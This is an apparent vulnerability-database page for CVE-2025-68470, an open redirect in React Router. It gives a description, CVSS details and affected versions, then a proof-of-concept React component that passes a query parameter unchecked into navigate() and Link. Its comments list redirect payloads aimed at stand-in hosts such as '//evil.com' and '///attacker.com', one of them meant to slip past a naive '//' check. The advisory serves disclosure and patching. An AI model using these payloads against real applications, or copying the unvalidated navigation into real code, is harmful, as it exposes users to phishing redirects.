Security Vulnerability Report
CVE-2025-68470 CVSS 6.5 MEDIUM

CVE-2025-68470

Published: 2026-01-10 03:15:48
Last Modified: 2026-01-30 18:20:55

Description

React Router is a router for React. In versions 6.0.0 through 6.30.1 and 7.0.0 through 7.9.5, an attacker-supplied path can be crafted so that when a React Router application navigates to it via navigate(), <Link>, or redirect(), the app performs a navigation/redirect to an external URL. This is only an issue if you are passing untrusted content into navigation paths in your application code. This issue has been patched in versions 6.30.2 and 7.9.6.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Weakness: CWE-601 (URL Redirection to Untrusted Site, "Open Redirect")

Configurations (Affected Products)

cpe:2.3:a:shopify:react-router:*:*:*:*:*:node.js:*:* - VULNERABLE: React Router 6.0.0 through 6.30.1 (fixed in 6.30.2)
cpe:2.3:a:shopify:react-router:*:*:*:*:*:node.js:*:* - VULNERABLE: React Router 7.0.0 through 7.9.5 (fixed in 7.9.6)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
jsx
// CVE-2025-68470 PoC - React Router open redirect
// Affected versions: React Router 6.0.0 - 6.30.1, 7.0.0 - 7.9.5
import { Link, useNavigate, useSearchParams } from 'react-router-dom';

// Vulnerable component: untrusted input is passed directly to navigate() and <Link to>.
function VulnerableNavigation() {
  const navigate = useNavigate();
  // An attacker can craft a URL like /navigate?path=//evil.com,
  // so userProvidedPath becomes "//evil.com".
  const [searchParams] = useSearchParams();
  const userProvidedPath = searchParams.get('path') ?? '/';

  const handleNavigation = () => {
    // Vulnerable code: no validation on the user-controlled path
    navigate(userProvidedPath);
  };

  return (
    <div>
      <button onClick={handleNavigation}>Continue</button>
      {/* The same untrusted path can also be rendered into a Link */}
      <Link to={userProvidedPath}>Click here</Link>
    </div>
  );
}

export default VulnerableNavigation;

// Attack vector examples:
// 1. navigate('//evil.com') - redirects to an external domain
// 2. navigate('///attacker.com/evil-page') - bypasses naive checks for a leading '//'
// 3. <Link to="//phishing-site.com">Malicious Link</Link>
// 4. redirect('//external-site.com/page')
//
// PoC URLs that trigger the vulnerability:
// https://vulnerable-app.com/?redirect=//evil.com
// or
// https://vulnerable-app.com/navigate?path=//attacker.com/phishing

References

https://github.com/remix-run/react-router/security/advisories/GHSA-9jcx-v3wj-wh4m (Third Party Advisory)